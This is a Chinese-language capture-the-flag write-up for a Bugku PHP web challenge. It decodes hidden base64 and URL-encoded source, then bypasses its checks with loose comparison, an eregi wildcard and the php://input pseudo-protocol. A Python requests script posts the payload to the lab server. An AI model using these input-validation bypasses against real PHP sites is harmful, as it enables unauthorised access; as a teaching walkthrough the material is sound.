题目解析
题目知识点:php以及伪协议、正则、自己还用了py(因为mac上没装burp等 )、编码
个人感觉是挺难的,用的知识点不少
题目描述:作者:御结冰城
题目链接:https://ctf.bugku.com/challenges/detail/id/88.html?page=4
首先分析一波
打开网页之后得到,只有一行字
说实话,结合url我以为是把id试出来 ,于是py写了个脚本,id从1到999试了一遍。。。由于过程缓慢,到三百多的时候,我决定先换个思路
先看看源码吧,只有两行,但是给了提示说有1p.html文件
然后破解一波
于是构建url:114.67.246.176:14183/1p.html,访问文件,发现回到了bugku首页,但是抓包过程中,发现有奇怪的东西出现了一下,就放弃用浏览器抓包,python写了一段爬虫
import requests
url='http://114.67.246.176:14183/1p.html'
head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
html=requests.get(url,headers=head).text
print(html)
得到
var Words ="%3Cscript%3Ewindow.location.href%3D’http%3A%2F%2Fwww.bugku.com’%3B%3C%2Fscript%3E%20%0A%3C!–JTIyJTNCaWYoISUyNF9HRVQlNUInaWQnJTVEKSUwQSU3QiUwQSUwOWhlYWRlcignTG9jYXRpb24lM0ElMjBoZWxsby5waHAlM0ZpZCUzRDEnKSUzQiUwQSUwOWV4aXQoKSUzQiUwQSU3RCUwQSUyNGlkJTNEJTI0X0dFVCU1QidpZCclNUQlM0IlMEElMjRhJTNEJTI0X0dFVCU1QidhJyU1RCUzQiUwQSUyNGIlM0QlMjRfR0VUJTVCJ2InJTVEJTNCJTBBaWYoc3RyaXBvcyglMjRhJTJDJy4nKSklMEElN0IlMEElMDllY2hvJTIwJ25vJTIwbm8lMjBubyUyMG5vJTIwbm8lMjBubyUyMG5vJyUzQiUwQSUwOXJldHVybiUyMCUzQiUwQSU3RCUwQSUyNGRhdGElMjAlM0QlMjAlNDBmaWxlX2dldF9jb250ZW50cyglMjRhJTJDJ3InKSUzQiUwQWlmKCUyNGRhdGElM0QlM0QlMjJidWdrdSUyMGlzJTIwYSUyMG5pY2UlMjBwbGF0ZWZvcm0hJTIyJTIwYW5kJTIwJTI0aWQlM0QlM0QwJTIwYW5kJTIwc3RybGVuKCUyNGIpJTNFNSUyMGFuZCUyMGVyZWdpKCUyMjExMSUyMi5zdWJzdHIoJTI0YiUyQzAlMkMxKSUyQyUyMjExMTQlMjIpJTIwYW5kJTIwc3Vic3RyKCUyNGIlMkMwJTJDMSkhJTNENCklMEElN0IlMEElMDklMjRmbGFnJTIwJTNEJTIwJTIyZmxhZyU3QioqKioqKioqKioqJTdEJTIyJTBBJTdEJTBBZWxzZSUwQSU3QiUwQSUwOXByaW50JTIwJTIybmV2ZXIlMjBuZXZlciUyMG5ldmVyJTIwZ2l2ZSUyMHVwJTIwISEhJTIyJTNCJTBBJTdEJTBBJTBBJTBBJTNGJTNF–%3E"
发现从第四行起是base64编码,解码得到
%22%3Bif(!%24_GET%5B’id’%5D)%0A%7B%0A%09header(‘Location%3A%20hello.php%3Fid%3D1’)%3B%0A%09exit()%3B%0A%7D%0A%24id%3D%24_GET%5B’id’%5D%3B%0A%24a%3D%24_GET%5B’a’%5D%3B%0A%24b%3D%24_GET%5B’b’%5D%3B%0Aif(stripos(%24a%2C’.’))%0A%7B%0A%09echo%20’no%20no%20no%20no%20no%20no%20no’%3B%0A%09return%20%3B%0A%7D%0A%24data%20%3D%20%40file_get_contents(%24a%2C’r’)%3B%0Aif(%24data%3D%3D%22bugku%20is%20a%20nice%20plateform!%22%20and%20%24id%3D%3D0%20and%20strlen(%24b)%3E5%20and%20eregi(%22111%22.substr(%24b%2C0%2C1)%2C%221114%22)%20and%20substr(%24b%2C0%2C1)!%3D4)%0A%7B%0A%09%24flag%20%3D%20%22flag%7B***********%7D%22%0A%7D%0Aelse%0A%7B%0A%09print%20%22never%20never%20never%20give%20up%20!!!%22%3B%0A%7D%0A%0A%0A%3F%3E
又发现是url编码,再次解码得到
if(!$_GET['id'])
{
header('Location: hello.php?id=1');
exit();
}
$id=$_GET['id'];
$a=$_GET['a'];
$b=$_GET['b'];
if(stripos($a,'.'))
{
echo 'no no no no no no no';
return ;
}
$data = @file_get_contents($a,'r');
if($data=="bugku is a nice plateform!" and $id==0 and strlen($b)>5 and eregi("111".substr($b,0,1),"1114") and substr($b,0,1)!=4)
{
$flag = "flag{***********}"
}
else
{
print "never never never give up !!!";
}
发现构造url需要三个参数a、b、id,要求分别如下:
a中不能含有.
id非空
b要满足’111’接上b的首个字符是’1114’的通配,并且首个字符不为’4’,并且长度大于5(这里用到了正则表达式的知识)
(注意==是弱比较)
不妨令 $b=*000000( * 是通配符 ) id=0dut2251
我们需要让data是’bugku is a nice plateform!'来获取flag
但是问题来了:
$data = @file_get_contents($a,'r');
这一行要把a作为一个文件的路径,将文件写给data,显然我们不能写出一个内容如此的文件
接着放一波技能
所以这里用伪协议 php:// 访问数据流,其中 php://input 可以访问原始请求数据中的只读流,让 变量a = “php://input”,然后在请求主体中提交字符串 bugku is a nice plateform!
接着通过py爬虫得到flag
import requests
url='http://114.67.246.176:14183/?id=0dut2251&a=php://input&b=*000000'
head={'User-Agent':'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20100101 Firefox/23.0'}
data='bugku is a nice plateform!'
html=requests.post(url,headers=head,data=data).text
print(html)